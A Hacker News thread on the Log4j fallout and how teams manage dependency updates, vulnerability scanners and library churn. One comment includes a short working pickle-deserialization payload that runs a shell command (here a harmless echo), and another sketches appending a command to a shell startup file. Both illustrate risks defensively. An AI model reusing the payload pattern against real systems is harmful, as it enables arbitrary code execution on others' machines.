Hacker News
Log4j: The pain just keeps going (thenewstack.io)
259 points by CrankyBear on July 20, 2022 | 288 comments


If you automatically update your dependencies all the time, you will constantly get new bugs, issues and sometimes even malware.

If you don't update your dependencies all the time, you will be vulnerable to old bugs and issues.

The current software engineering paradigm has no meaningful answer to this, no matter what "security experts" tell you. In a sane industry this realization would lead to a change of the paradigm, but people in our industry seem to be only doubling down.

"Use a build tool to do dependency checks!"

And then what?

"Only update libraries if they have vulnerabilities."

So, should this be a manual process where I have to dig through obscure warnings every time I build something?

"No, you can automate it!"

Congrats, you've just outsourced the decision making process about which versions of libraries to use to some 3d party. You've also made your build process reliant on yet another online service.

"But it's not a hard dependency, you can still build if the 3d party service is off."

So the exact software you compile will depend on whether or not you can connect to a 3d party service? Do you understand the actual implications of this?

Etc. People with clever advice don't seem to think it through. We're fighting fragile complexity of too many tools ducktaped together by ducktaping more tools to the whole setup. Again and again and again.


> The current software engineering paradigm has no meaningful answer to this, no matter what "security experts" tell you. In a sane industry this realization would lead to a change of the paradigm, but people in our industry seem to be only doubling down.

On the contrary, I believe we do. The answer is ongoing maintenance.

The basic problem is that people persist in looking at software as a fundamentally mechanistic artifact you finish and ship in a static environment. Then you move on to the next thing. This is fundamentally incorrect. Software engineering is a process that takes place in an adversarial, human-driven environment. There is fundamentally no automating this away because human decision-making work is required.

Any security expert worth their salt will tell you this. As long as you persist in trying to view software as a fixed artifact in a static environment, you will find there is no meaningful answer. Those who come to terms with the dynamic, human-driven reality will find that there's a well-understood - if inconvenient and expensive - answer.


So then what do you do with software that doesn't meet this standard? Software that works, that meets a need you have, but that is a fixed artifact, or at least will be in the foreseeable future. Do you refuse to use said software, and instead choose a less useful alternative that is actively developed?


We see this all the time in healthcare. An MRI machine that cost 500k 20 years ago still works fine, but only on Windows XP. The cost to rewrite the software for Windows 10 is more than 500k, so rather than paying for that, they firewall the shit out of it so it can only talk to some printing / output device.

That’s just one example. Medical machines are expensive as hell and companies don’t want to rebuy or constantly invest in something that works and does one thing well.


I was visiting my parents this summer and they have a Gameboy from 1991 with a Tetris cartridge, which was authored in 1989. They use it regularly and it still works! For over 30 years this device has played Tetris without requiring any software updates.


Not to split hairs, but I think what you've described is constant investment in something that works and does one thing well. The firewalls and management and maintenance are all ongoing costs to manage the risk.

Software is never just an artifact. It's a whole system, of which the source code and binaries are some components. If you do not manage those artifacts, the next best option is generally managing the environment.


I'm not familiar with this kind of software, but if it were written for, say, Linux, would it need such an expensive rewrite to work with current versions?


I still run software I wrote for Linux in 1998. It runs in a LXC container with all the old libraries and it must run in an Xvnc session with a window manager of the era because there is a Qt1 widget that opens a kind of drop down menu that just doesn't work with any modern window managers.

I probably wouldn't bother to try to port it to modern versions of Qt or whatnot even if I hadn't lost the source code 15y ago.

So yes, it happens, it's possible, it sucks


that gameboy cartridge isn't working on a modern system either...


I believe the point is that no software is a fixed artifact. Regardless of the state of its development, it's all reactive to factors outside of its control, whether that's other software, users, hardware, etc.


In fact yes. I'd choose a maintained lesser library or an in-house implementation over an unmaintained one. This is also the main benefit of Python, with its huge standard lib that effectively gives some maintenance guarantees.

To give you an example: XLSX parsing. For quite a while, the most performant library 'xlrd' had a big scary unmaintained notice on GitHub, yet people kept recommending and using it, often unnoticed through pandas, because they don't read docs. I'd refuse to touch that and instead use openpyxl, and now newer xlrd releases have even completely removed xlsx support.
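For anyone who wants that dependency to be explicit rather than silently inherited through pandas, a minimal sketch (the file name is just a placeholder):

  import pandas as pd

  # Newer pandas versions default to openpyxl for .xlsx files; naming the
  # engine explicitly keeps the dependency visible instead of implicit.
  df = pd.read_excel("report.xlsx", engine="openpyxl")
  print(df.head())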


That's a risk management problem. For how long will the world around this fixed artifact remain constant? How far away is your "foreseeable future" horizon? What happens when you're wrong? I have, in fact, chosen to use actively developed and maintained systems with fewer features than unmaintained EOL'd ones.

When you choose software to solve a problem, you're not just choosing software. You're encoding expectations around the problem, the environment, and your needs. If all three of those can be assured to never change then choosing a fixed artifact might be the way forward. Should any of those ever change, then your software will either adapt or become a less suitable solution.

How often can an organization really be that certain?


That's exactly right - it's about risk. No one has "perfect" operations/ security. They have a threat model and a risk tolerance.


That is solved with standard engineering practices.

If you need to make guarantees about your product that are dependent on another piece of software, then you just have your vendor produce a spec and guarantee conformance to the spec, then you audit that the spec fulfills your fixed needs and audit that the implementation conforms to the spec.

Then, if you made a mistake, your liability is limited to your mistakes instead of your mistakes and the mistakes of your dependencies.

If, on the other hand, you do not get any guarantees from your dependencies, and you fail to achieve your guarantees, then that is entirely on you, as you are the one transforming the absence of guarantees into guarantees.


We actually are running into this exact problem with running production ML workloads and despite anyone's claims it's not a solved problem. In fact, this log4j mess is a cake walk in comparison.

The issue: ML workloads are very sensitive to the exact version of a framework/library used and these frameworks/libraries are not stable despite what their semantic version says.

So what do you do when you have a python vulnerability? Best case, an update "just works" but in many cases you either need to retrain the model (can be extremely expensive or inconvenient), rewrite it if APIs changed, or hunt down a difference in model output if some downstream dependency broke something. Stability of software in the python world is abysmal.
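One partial mitigation is at least recording the exact environment a model was trained in, so a later retrain or security-driven rebuild starts from a known baseline. A rough sketch (the output file name is arbitrary):

  import json
  from importlib import metadata

  # Snapshot every installed package and its version next to the model
  # artifact, so the training environment can be reconstructed or diffed later.
  versions = {dist.metadata["Name"]: dist.version for dist in metadata.distributions()}
  with open("model_environment.json", "w") as f:
      json.dump(versions, f, indent=2, sort_keys=True)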


Is this an issue of code stability, or do these libraries have leaky abstractions that cause issues with models trained on a previous version because the library implementation changed? And since ML has low explainability, it's hard to tell how the change impacts model performance, e.g. making a library run faster, or having it use a slightly different parameter internally, causes some floating point imprecision that cascades into wildly different results?


Unfortunately it's all of the above. Sometimes the code isn't stable (e.g. a library method changed), sometimes the behavior has changed (e.g. same library method but now it has a different behavior), and sometimes it has some other unwanted effect (the computation produces a totally different result, it runs way slower, or something else).

With a service it's all much easier because you can have pretty robust integration tests and you're good to go. With an ML model it's a lot trickier because even if you have sample payloads and responses there might be other payloads you didn't think about that could cause issues. Or it might rear its ugly head when you finally retrain the model and suddenly model performance is crap.


There's also the issue that subtle bugs are a lot harder to find in ML since often the model just adapts (although potentially with worse performance). This then breaks models when the framework updates.

One recent example that comes to mind is that PyTorch now disables Ampere GPUs' TF32 units by default since there were some hard to find edge cases where the matrix multiply results were completely wrong compared to the expected result. This went mostly unnoticed except in a few cases where users were trying something a bit more sensitive to such issues.
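For reference, opting back in is just a couple of flags; a sketch assuming a recent PyTorch on an Ampere GPU:

  import torch

  # PyTorch turned TF32 matmuls off by default on Ampere GPUs; re-enabling
  # them is an explicit precision-for-speed trade that should be validated
  # against your own model.
  torch.backends.cuda.matmul.allow_tf32 = True
  # Convolutions have a separate switch.
  torch.backends.cudnn.allow_tf32 = True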

I had a similar issue in one of my own models where there was an error in a normalization layer's implementation in Tensorflow (it was computing the average over the wrong axis iirc). It only became noticeable to me when I came back to retrain the model a few months later with an updated Tensorflow version and found that the results from training were not even comparable.
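As a toy illustration of that kind of axis mix-up (not the actual Tensorflow bug), normalizing across the batch instead of across each sample's features still "works", but produces different statistics:

  import numpy as np

  x = np.random.rand(32, 128)  # a batch of 32 feature vectors

  # Axis 0 normalizes across the batch; axis 1 normalizes each sample's
  # features. Both run fine, but they are not the same computation, so a
  # silent upstream fix changes model behaviour between versions.
  wrong = (x - x.mean(axis=0)) / x.std(axis=0)
  right = (x - x.mean(axis=1, keepdims=True)) / x.std(axis=1, keepdims=True)
  print(np.allclose(wrong, right))  # False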


I find Python is very prone to a lot of breaking changes even with minor version changes. And not just that, even minor versions have to match up specifically with another library's minor version. It seems to be a community or ecosystem problem with Python, which is why I avoid Python as much as possible.

In every other ecosystem, when minor versions are updated there are very rarely issues, and there are few compatibility issues with minor versions of libraries.


My (somewhat dated) experience says that Ruby is all the way worse than Python on this.

In part due to a culture that encouraged monkeypatching. With the result that what behavior you get depends on who last monkeypatched it. So a dependency 3 deep that loads the module you expected to load last suddenly causes the monkeypatch you were depending on to disappear...


Monkey patching was the greatest thing ever. Until the community realized how bad it was. Don’t see it much these days


eh, people love to break stuff on minor version changes of Go libraries too


At least you find out at compile time...


is this ML workload an "I trained a model, pickled it, and now we ship that around in production" type situation?


> So what do you do when you have a python vulnerability?

If you are willing to run other people's arbitrary (Python) code, then - vulnerability or no, you should consider the system running this code as compromised.
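That applies doubly to the pickled-model scenario asked about above; a classic illustration of why unpickling untrusted data is running untrusted code (the command here is a harmless stand-in):

  import os
  import pickle

  class Payload:
      # pickle rebuilds objects by calling whatever __reduce__ returns,
      # so loading this "model" executes an arbitrary command.
      def __reduce__(self):
          return (os.system, ("echo compromised",))

  blob = pickle.dumps(Payload())
  pickle.loads(blob)  # loading the pickle runs the command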


When I worked on a code signing app, which is arguably some of the highest stakes of almost anything I've worked on, we came around to an agreement that one ticket a month would be assigned to upgrade libraries, and we rotated that responsibility. We didn't stipulate what library, we didn't even stipulate which application in the suite (though it was assumed that you were likely to choose your primary application as the target), so long as something got upgraded.

This policy evolved, if memory serves, after a security issue was discovered with the XML library we were using. The fix was not back ported to our version, and the versions in between had multiple breaking changes, so it was a slog to fix it.

It wasn't even that we were having a production issue, because we were still in development and internal testing. Not a single 'real' signature had been generated yet. It was all test assets and test CA certs. But we had enough wisdom to put 2 and 2 together and get 4, so we tried to treat the situation as a dress rehearsal for some later bug that happened after we started playing for keeps. Almost everyone could see this was an untenable situation.

There were consequences of course, but we made a bit of lemonade in the process. Our integration tests were expanded to include a larger percentage of pinning tests for our dependencies. Given the gravity of the situation, we needed those anyway. We just now had a poster child for doing the work.


> we rotated that responsibility

how did that go ? I often wanted to do it but never got to submit the idea.


A couple didn't get it, a few chose things we might not have picked, but that was fine because sooner or later having 'dumb' out of date dependencies adds up to real problems.

It also took some reminders from the leads to add it in instead of letting it slip, but so far it's the least broken process I've gotten to use.


>"Use a build tool to do dependency checks!" > >And then what? > >"Only update libraries if they have vulnerabilities." > >So, should this be a manual process where I have to dig through obscure warnings every time I build something? > >"No, you can automate it!" > > Congrats, you've just outsourced the decision making process about which versions of libraries to use to some 3d party. You've also made your build process reliant on yet another online service.

Sorry, this is a total strawman. Automation doesn't need to be integrated with the build in such a way that it creates noise, and it doesn't mean you need to let changes be applied without human intervention.

I'm hooked up with Snyk which scans all of my dependencies and sends me a summary email if it discovers any vulnerabilities. It creates PRs that can patch dependency vulnerabilities, and I can apply them if I approve of the change. If I don't think the change is worth it or the vulnerability is relevant, I can go to the Snyk site and mark a vulnerability to be ignored, or even tell it to ignore it for a month or whatever. I'm sure Snyk isn't unique, either.

Yes, a human should be involved in decisions. No, it doesn't need to be noisy.

I'm on Node.js and working on multiple projects with crazy numbers of dependencies, and the number of "new vulnerabilities" I see is typically a few per month at most. Some months there are no new notifications at all. It simply doesn't change that quickly, and it's not constant noise unless you ignore the notifications, and that's just bad software engineering.


> If I don't think the change is worth it or the vulnerability is relevant, I can go to the Snyk site and mark a vulnerability to be ignored, or even tell it to ignore it for a month or whatever.

I am currently fighting with our security team because they refuse to allow developers to do this, and instead require my team to file tickets with their team, wait hours for that ticket to be picked up, explain why a thing is a false positive to a person who doesn't understand the codebase they're working on, and hope that person feels that the finding should be ignored.

I do not work at a large company.

This is greatly exacerbated by the fact that Snyk - like all package scanners - primarily flags false positives. When you start digging in to what it flags you'll find that a lot of the vulnerabilities aren't reasonably exploitable, or the impact is questionable, or you can't repro the issue. Those that do legitimately affect the underlying library often don't affect your usage of that library. I'd estimate our false positive rate is >90%. So when we get a finding our options are to go through that costly and disruptive process I mentioned above, or just upgrade the dependency (which carries associated risk of breaking shit in production).

These tools emphasize the quantity of findings they produce, and quietly ignore the quality. As soon as you have any divergence in motivations or incentives between the people running the scanner and the people being blocked by the scanner those low quality findings become incredibly costly.


This is compliance vs security. Finding vulns checks a box for SOC2, but in reality detection is the easy part. Figuring out what to fix, based on real-world usage and risk, requires much more work and is often ignored.

I'm sorry you're on the receiving end of this problem!

Shill notice: I'm working on an Open Source tool[0] that makes this problem less horrible. My colleague wrote a post about our hypothesis[1] about how we can avoid this false positive trap.

I'd love to chat with anybody feeling this pain (even just as therapy lol).

0: https://github.com/lunasec-io/lunasec

1: https://www.lunasec.io/docs/blog/the-issue-with-vuln-scanner...


This is basically what Dependabot on GitHub does too. If it finds a vulnerability it creates a PR that you can decide to apply. It's automated to the extent that it's easy but it's not making or forcing changes on you. A human is still in control.


True enough, though Snyk will sometimes offer a patch rather than a PR to a new version of the dependency.

The Snyk tools apply the patch directly to (e.g.) `node_modules` after the latest code has been downloaded.


I think people's experiences will vary with tools like this due to company policy. For instance, your company allows you to make decisions about whether a vulnerability pertains to you, but many don't. I think that's how these tools become "noise", because the only option an engineer is given by leadership is to comply with the tool.

At this point, I think a lot of problems in software are actually misaligned or misincentivized policy gone awry. When you read about them on forums they look technical, but they're not.


You can't use a technical solution to fix a management problem, no. :)


I don't see how you have really fixed the break much. Especially if you can "push back" and say no to an update, you are just setting yourself up for when the update is even harder to accept. (That is, the further behind on an update you are, the harder to take it. Typically.)

And then there is the "I want the fix, but I don't want the added attack vector of features that comes with it."


99% of the time it's a minor update patch that you really should just apply, or Snyk will add a patch to the build to fix the security hole directly.

Honestly it's just not worth worrying about whether a security hole is exploitable when the decision is whether to accept a minor update patch. Just accept the patch PR and move on.

The times you need to do a major update to get a patch fix, it's equally important to just make that upgrade, since that means the ancient version you're using is likely out of maintenance and likely is throwing warnings that you're using a deprecated version.

Yes, it's more work to perform a major upgrade. But that doesn't mean it isn't good engineering to keep your tools up to date.


Sure, but you're in control, and can decide to do what's best for you and your organization. Taking on the technical debt of allowing your dependencies to get further and further behind isn't a decision I usually make, but it can be a valid one depending on the individual circumstances.


I mean, you aren't wrong. But this is akin to saying you don't need a memory safe language, because you can decide what is best for your application's memory needs.

That is, I think the ask is more of "why haven't we come up with something that is a bit better at mitigating risks, here?"


Software engineering is complex. Some of the challenges are simply irreducible.

I believe this is one of them.


Let's not forget that promotions are for those who build new stuff, and those who maintain old stuff don't get promoted.

To add further insult to injury, colleges send SWE/SDEs into the workforce to learn to 'actually code', while companies have no time to train jr developers, so they are just thrown into the fire and left to hope for the best.


At most companies I've worked for, mentoring and training junior engineers is a requirement for promotion. Also, you might not get promoted for maintenance but

1. keeping it running with a healthy userbase and demonstrating high impact does, and

2. if you know how to spin it, then maintenance work can look like "building new stuff".


> At most companies I've worked for, mentoring and training junior engineers is a requirement for promotion.

You've worked for some great orgs, then! My experience is mostly the opposite. One company I worked for did value mentorship, at least somewhat, and it was a factor in promotion decisions, but not mentoring others didn't really stop people from getting promoted.


I think this is more of a "do what I say, and not what I do" thing. Nominally most companies want you to mentor junior devs, but the worker who spends less time on that, and more time on higher visibility work gets the promotion priority.


I have a very simple solution, in three parts:

1) We use very few dependencies. We err on the side of writing our own function, library, or UI component rather than installing a new dependency, even if a "better" open-source version might theoretically be available.

2) We use a monorepo. We have two Go backends sharing the same go.mod, and three Typescript/React frontends sharing the same package.json, all in the same repo. An upgrade for one is an upgrade for all.

3) Every first Friday, I update all dependencies to the latest version. Including major versions. Yes this is a pain sometimes (like when I realized we were on Webpack 4 and the latest was Webpack 5), but if you do it consistently, it's usually not that much trouble. 1-2 hours per month on average.

In terms of security, I think this is a good middle ground. The approach has other benefits than security, too.


> 1) We use very few dependencies. We err on the side of writing our own function, library, or UI component rather than installing a new dependency, even if a "better" open-source version might theoretically be available.

This just means you likely have a lower quality version with the same problems but without the benefit of an ecosystem to find them.


It doesn't mean that at all. When we need one feature we write it, rather than exposing the 1000 features of an open-source library to the internet when we only need one feature.

We won't write it ourselves if we aren't sure we can do it well, i.e. we're not going to roll our own encryption. Those are the types of dependencies we do use, and upgrade once a month like clockwork.

The point is not "don't use someone else's encryption library," the point is "don't use someone else's LeftPad() function that takes 3 lines to write". That gives us fewer dependencies, which makes it easier to upgrade all dependencies regularly, which is good for security.
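For illustration, the sort of trivial helper meant here really is about three lines (a hypothetical left_pad, in Python for brevity; the built-in str.rjust already does this, which only strengthens the point):

  def left_pad(s: str, width: int, fill: str = " ") -> str:
      """Pad s on the left with fill until it is at least width characters."""
      return s if len(s) >= width else fill * (width - len(s)) + s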


>We use very few dependencies.

While this may solve the "exploit from 3rd party dependencies" this says nothing about the security quality of your functions. Now instead of the vuln being found in the 3rd party package and fixed, the issue remains in your program forever, probably getting exploited by nation state level actors without your knowledge.


A benefit of writing your own functions: you won't implement something you don't need, which reduces the attack surface.


Until your developer decides to write their own encryption routines.


Yup, you’re outsourcing your decisions in exchange for not doing the work. You have to understand your risks and needs.

Your boring business systems that will live for 50 years need to have boring system level libraries or stuff you maintain. Your fast time-to-market or non-critical systems are optimized for speed and cost.

If your service depends on a bunch of downstream stuff, your processes need to support upgrade cycles. If you can’t keep up with that, you need to refactor.


There is pressure in our org to find ways to have fewer dependencies.

Some of this is trivial, and a very good thing - stop using bullshit exercises in fragmentation like isEven.

Some of it is very much not, and will apply pressure to find vendors who are willing to vet their own bundles of commonly used libs.

There will be numerous second order effects of that, including the ghettoization of open source that isn't "QualStrike Approved(tm)".


System level libraries are a huge risk. It makes updating much harder leading to many developers just foregoing updates unless absolutely necessary. Libraries your software uses should be decoupled as much as possible from system level libs.


Big-tech has solved this internally. Everything down to the linux kernel they're running in prod is versioned and has people maintaining it and interacting with upstream (if any). This is obviously a full time job for at least a person per dependency on average.


>The current software engineering paradigm has no meaningful answer to this, no matter what "security experts" tell you. In a sane industry this realization would lead to a change of the paradigm, but people in our industry seem to be only doubling down.

Capability-based security is one possible answer. The Austral language is trying to make this a first-class language feature:

>The problem is that code is overwhelmingly permissionless. Or, rather: all code has uniform root permissions. The size of today’s software ecosystems has introduced a new category of security vulnerability: the supply chain attack. An attacker adds malware to an innocent library used transitively by millions. It is downloaded and run, with the user’s permissions, on the computers of hundreds of thousands of programmers, and afterwards, on application servers.

>The solution is capability-based security. Code should be permissioned. To access the console, or the filesystem, or the network, libraries should require the capability to do so. Then it is evident, from function signatures, what each library is able to do, and what level of auditing is required.

https://austral.github.io/spec/rationale-capabilities
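As a rough illustration of the shape of that idea (sketched in Python, which cannot actually enforce it the way a capability-secure language can): a library function receives an explicit, narrow capability instead of ambient access to the whole filesystem, so its signature advertises everything it is able to do.

  class AppendOnlyLog:
      """A narrow capability: can only append lines to one pre-opened file."""
      def __init__(self, path: str):
          self._file = open(path, "a")

      def append(self, line: str) -> None:
          self._file.write(line + "\n")
          self._file.flush()

  def record_login(log: AppendOnlyLog, user: str) -> None:
      # Receives only the append capability; nothing here can open sockets
      # or touch other files without being handed a capability for them.
      log.append(f"login: {user}")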


There are a few issues here...

1. Depending upon context, *any* change to state (network I/O, console I/O, file I/O, environment variables, etc.) is a security vulnerability you can drive a truck through. For example: Foo is a very locked-down package that only appends text to a file the caller owns. It's formally verified to only change the file specified, verified to only append in all possible situations, verified to not have cross-file-system identity problems, not subject to file renaming race conditions, yada yada yada. Safe? No. "foo('evil_command', '~/.bash.rc')".

2. A useful definition of a "capability" depends upon context. A *dynamic* context. Say Foo is intended to be used for generating log files. There's no way for a third-party library to determine whether the target is actually such a thing. It requires manual tuning which fits the operational context. Perhaps the file must be named "/var/log/${x}.log". Or maybe it's "${home}/local/log/${x}.log". Great. Of course, now you've got to verify the context-specific definitions. And verify the tool that does this verification. And then verify the configuration of the tool that does the verification... Safe now? No. Context is *dynamic*. "foo('var/log/evil-hack-attempts.log', '0.0.0.0/0 tried-to-crash-us')", and your other context, the automated blacklisting, locks out the Internet.

3. This gets very complex very quickly. IMHO, configuring SELinux in a real production environment with real personnel is akin to rolling your own cryptography. Can people learn to do it? Of course. But the same argument applies to writing cryptographic functions. You. Will. Make. Huge. Mistakes.

To be clear, this does not mean that capabilities are useless. It's obviously critical that they exist. However, they ain't magic. You can't "solve security with capabilities." There is a point where throwing more of them at the problem makes things *worse*.


What? Are you crazy? Talking about security to developers! How dare you?


because our industry is obsessed with abstractions - the motto is to never fix anything, just pave over it with another abstraction.

for example we didn't fix how we build applications and manage dependencies, we invented Docker.

we didn't create a secure runtime for the cloud where applications can run, instead we virtualised whole operating systems


> because our industry is obsessed with abstractions

"we do not break userland, period" -- Linus Torvalds

not breaking existing stuff is why many abstractions exist, and even why many are put in place early on, to allow for some wiggle room without having to break all the things. people tend to prefer software that continues to work, above all else.


I think we should acknowledge, though, that not all abstractions are created equal. Abstractions that hide implementation details and allow people to change those implementation details without creating churn and extra work for their downstream consumers are good.

Abstractions that paper over problems that you are unwilling or undisciplined enough to tackle properly are usually bad. I think the grandparent was talking about this kind.


> Abstractions that paper over problems that you are unwilling or undisciplined enough to tackle properly are usually bad

some abstractions carry decades of legacy (e.g. the Linux file-system hierarchy) and cannot simply be replaced. things that did not connect to the (then non-existent) internet did not have to paper over problems that simply could not exist at that time (VMs, multi-user, multi-tenant hardware). there are plenty of deep software dependencies that are no longer maintained which still rely on these abstractions and cannot be cheaply/reasonably replaced in the field. sure, we have new abstractions since then, but only new and actively maintained software can ever make use of them, and that will only end up in systems that are also actively maintained instead of simply continuing to work with exactly zero effort.


but then someone builds a bank on top of this abstraction, and all sorts of shit hits the fan.


Working in the industry I do, there are a number of banks I will never use based on the terrifying lack of quality in the software they write. The SBOM on these projects could be printed out and bound as a dictionary, there are so many packages included.


except, it's turtles all the way down. is POSIX not an abstraction? TCP? C/gcc/llvm? glsl?


You are correct, but it's not just abstractions, it's specifically abstractions on a shitty platform.

The whole log4j thing happened because Java is very poorly designed from the get-go, and one of those points is the insistence on making everything an object, including data. And of course, you often need to output the string representation of data.

From a theory perspective, if you want to rely on language features like strong typing to ensure correctness, then you have to take it all the way to full provability, where you explicitly guarantee bounded input, bounded output, and any side effect (where a network call is a side effect, and if your code doesn't explicitly state that this side effect will happen, it won't run).


There is likely never going to be an approach that yields 0 vulnerabilities, so instead we should be more focused on minimizing the risk as much as possible. There is a middle ground and nuance between never update and always update, just as there is a nuance in how much and what you duck tape together.

Not sure if it's the best, but my current approach is to target major revisions/versions with ABI/API compatibility as viable candidates, and update always, but at a lagged rate, ideally allowing enough time to pass for vulnerabilities to be surfaced in those versions. Log4j is a tough case due to how far back it goes version-wise, but you simply can't win them all.

Another important way to minimize risk is to have a strong ability to provide a corrective action. If replacing the version or the entire dependency of a library you use takes a significant engineering effort, then you are arguably at a higher risk due to that than you are in your decision to never vs. always update.


I still think that better ABI/API stability & control _is_ ideally the better solution, but even if I'm a fan of plain old C / sonames dependency management, I'll readily admit that very few people actually make any kind of API promises these days, much less ABI promises.


ABI/API stability != behavioral stability, though. I can give you a dependency with exactly the same interface, that will still break your software. It's not a solution (even if it helps with one piece of the puzzle)

The only complete solution would be static analysis (read: type systems) that can guarantee everything about some code's contract/behavior relative to the caller. Short of that, it's just going to continue being a bunch of manual half-solutions like API checks, existing type-level checks, manual changelog reading, manual upgrades, testing, etc.


I think a mindset that could work is to accept software as done. This is hard, but for foundational stuff it could work well. Only fix bugs in such software. Try to set a scope for what the software should do, build it, then do maintenance on it. Supersede it entirely to add new functionality.

That's my armchair take on it.


Adding features to existing software is much cheaper than writing entirely new software (not to mention the cost to switch!) At the same time, new features in low level software can unlock substantial value. Say a new API that speeds up your app by 1% or cuts down on further development time by a small fraction.


> Congrats, you've just outsourced the decision making process about which versions of libraries to use to some 3d party.

Aren't we already doing that, to some degree, by watching for notifications of vulnerabilities, and then manually patching or updating? Sure, with this method, we have the ability to decide to ignore a vulnerability, but I'd guess most people aren't great at assessing risk (and may not fully understand the severity of a vuln, or if their use of the software makes them exploitable), and should probably just update whenever a fix for a vulnerability comes out. So you might as well automate this.

> So the exact software you compile will depend on whether or not you can connect to a 3d party service?

Anyone who builds against public package registries (Maven Central, npm, pypi, crates.io, etc.) already has this problem. Some people will go to the effort of putting their own proxy cache in front of these registries to insulate themselves from downtime, and I expect these sorts of people would do the same for a 3rd-party vulnerability updater service.

Regardless, I wouldn't expect this to be a "pull" model, wherein you wait until the next time you'd build before getting security updates. More likely you would get a notification or even an automatically generated pull request (like GitHub's dependabot does) when a security update is available. Then it's up to you whether you want something else to automatically apply those updates, or you can review them yourself and apply manually.

I think you're just making a mountain out of a molehill. There are several existing options to automate or partially automate this, depending on your trust of the relevant third party. And you can still do it manually, if you so desire.


And what would you have anyone do?

You could formally spec software and implement it, congrats you're now 1000x slower to market and any change you want to make is another 1000x investment to spec out and prove.

And let's not even mention the ridiculous idea that open source developers be expected to do this. Moreover, this doesn't even handle hardware problems!

Okay, but we could just build all the software internally, reinvent all the wheels. But how is this any better? Now you have even less manpower to fix bugs and you're probably 100x slower to market because you're building all these half baked, bug ridden libraries.

If anything, the best idea is formally verified sandboxing, so that you have strong assurances about certain apps not doing bad stuff, but this doesn't solve all problems either.

It's an unsolvable problem in general, which is why no one has solved it.


It takes a lot longer to build houses that are up to building codes, and bridges that have 10x safety factors rather than 2x. There's a reason we have building codes and large safety factors. Software engineers are discovering this today.


Software engineers are mostly aware of this. There is just little market demand for this level of robustness.


Engineering codes of ethics dictate that the safety of the public and the environment is paramount. I know that's true for my P.Eng governing body; it is written into our bylaws. I'm sure it's the same for most others as well.

I think until Software Engineering catches up in this regard with traditional Engineering disciplines we'll continue to see issues arise from the software realm. As much as the self-titled "Engineers" proclaim it, there's more to engineering than design and production.


I've always been uncomfortable calling myself a "software engineer" for this reason, and usually refer to myself as a "software developer". Most of the job listings I see at various companies use "engineer" though, and so my official title ends up being "engineer", so that's what I end up putting on my resume. (Though I guess I don't really need to do that; I could put whatever I want.)


I am a Software Engineer. I'm licensed by our provincial body and have my P.Eng. and yeah, I still agree with you.

I've been asked why I got my P.Eng as it does nothing for me career wise, but I always have the hope that we move towards a profession that does utilize engineers with proper accreditation and responsibilities where appropriate. I work in Industrial Controls and what my job has me doing does have safety concerns. We fired a student at one point working for us because his attitude towards the work was lackluster and lazy. I see it often enough in programs I'm asked to pick up and fix too.

If Software Engineering wants respect, the profession needs to accept that we're going to piss off a lot of Developers & Architects using the title incorrectly. We still need to develop the proper rigor to take Engineering as a discipline seriously, but we also don't need to apply "Engineers" to every job.


there was no market demand for building codes, either. that's why they're laws


bbut but mah free market gave us fire escapes attached to every building in new york, and they were made of wood!


I know you're being sarcastic, but this reminded me of Tanya Reilly's _great_ talk "The history of fire escapes: How to fail". There's a recording up at https://www.infoq.com/presentations/history-fire-escapes-res...


Countries that pass laws making it 10x more difficult to develop software will not survive the next few decades.


> We're fighting fragile complexity of too many tools ducktaped together by ducktaping more tools to the whole setup. Again and again and again.

You've brought up three relevant points:

1. The tools are software, whose strength and weakness is being easy to change.

2. The tools rely on abstraction, whose strength and weakness is summarizing/hiding complexity.

3. Communication between publishers/consumers of these tools is hard.

Armchair-coaching, I now come up with at least three solutions:

1. Re the weakness of #3: ensure that when an issue is found at one layer, communication happens to maintainers of all other layers up and down.

2. Re the weakness of #2: collapse the layers - analyze dependencies and don't go past more than x number of abstractions.

3. Re the weakness of #1: don't use software.


There is no free lunch - each line of code is a liability even if it comes from a dependency. You wrote a few lines of code which depend on a 100k LoC library, and now you are exposed to bugs and vulnerabilities which may exist in those 100k LoC, not only in your few lines.

If you're using a library you have to spend time on keeping it up to date (which includes testing and fixing whatever went wrong during an update).


And there's the tangling of dependencies. One fix in one lib may cause a bug in another that isn't maintained.


Or you can end up with conflicting versions of transitive dependencies.

Or even worse you may have a legacy "fat jar" that you can't even manage the transitive dependencies on - they're compiled in, and that's that. Something else has a version conflict? Tough shit, one or the other is going to break, and depending on how bad your build is, you may not even get an explicit choice, it may be thrust upon you by the classloader.

Sometimes you can mitigate it somewhat by encapsulating them in their own service and just firewalling the hell out of it, and modules should help the dependency conflicts somewhat, but the problem is these are basically "UXO in the backyard garden": they are a passive business risk, and sooner or later you may get unlucky and they go boom even though you did nothing wrong.

Despite your best intentions, sometimes you gotta update dependencies, and if you allow it to fester, then you risk that the time you have to solve the problem is during an urgent security crisis. Generally it is better to update them on your own timetable than to have it forced upon you like that. And the problems and limitations and workarounds only become worse and worse over time if you choose to actively ignore it.


it's an interesting issue technically.. if only we didn't have to suffer its reality :)


Just patch on a cadence and assume you've got some vulnerabilities lying around. When there's something serious like log4j, pull the lever to update asap. I think you're overcomplicating this.

It'd be cool if devs didn't suck ass at writing code but that's the world we live in.


The ease with which software remains mutable after deployment is both a blessing and a curse. This is particular and intrinsic to software and other digital artifacts. Things based in matter do not benefit from this blessing or suffer from this curse.


"If you automatically update your dependencies all the time, you will constantly get new bugs, issues and sometimes even malware.

If you don't update your dependencies all the time, you will be vulnerable to old bugs and issues."

>has no meaningful answer to this...a sane industry this realization would lead to a change of the paradigm

This sounds like gene mutation and evolutionary selection pressure. It's sort of a fundamental aspect of the universe no? There may not really be a meaningful "answer" to this in principle just various half-measures to muddle along and adapt to this reality, survival of the fittest in a sense.


>no matter what "security experts" tell you

Why the scare quotes?

>In a sane industry this realization would lead to a change of the paradigm, but people in our industry seem to be only doubling down.

Maybe because half the time, when people with extensive training/experience in security even start to say something, they are completely disregarded (like here), or are hamstrung by budget because security is viewed as a garbage disposal that profits get shoveled into, or because they are hamstrung by pushback over every little change because people seem to think the main goal of someone doing security is pissing off users.


I was wondering when it would become the norm to call it "ducktape". It has been 3 hours and nobody has corrected it. Last week I found a 3-pack of "ducktape" in the builders market.

I'm not making fun of you or trying to be funny - it is simply an observation that I find interesting.


Where I live there's a brand of duct tape called Duck Tape. It's terrible compared to the 3M brand tape, but it's cheap so it's popular.

Also nobody that knows what they're doing uses "duct tape" on ducts, so the name is pretty meaningless.


> So the exact software you compile will depend on whether or not you can connect to a 3d party service? Do you understand the actual implications of this?

This is already true for the vast majority of software using any online software repository, e.g. Go, NodeJS, Java, Rust, etc.


Yeah but you can cache the packages or store them in some fashion. I've seen JAR files in git repos far too many times...

With security, you need some online service so you can find the new CVEs every day.


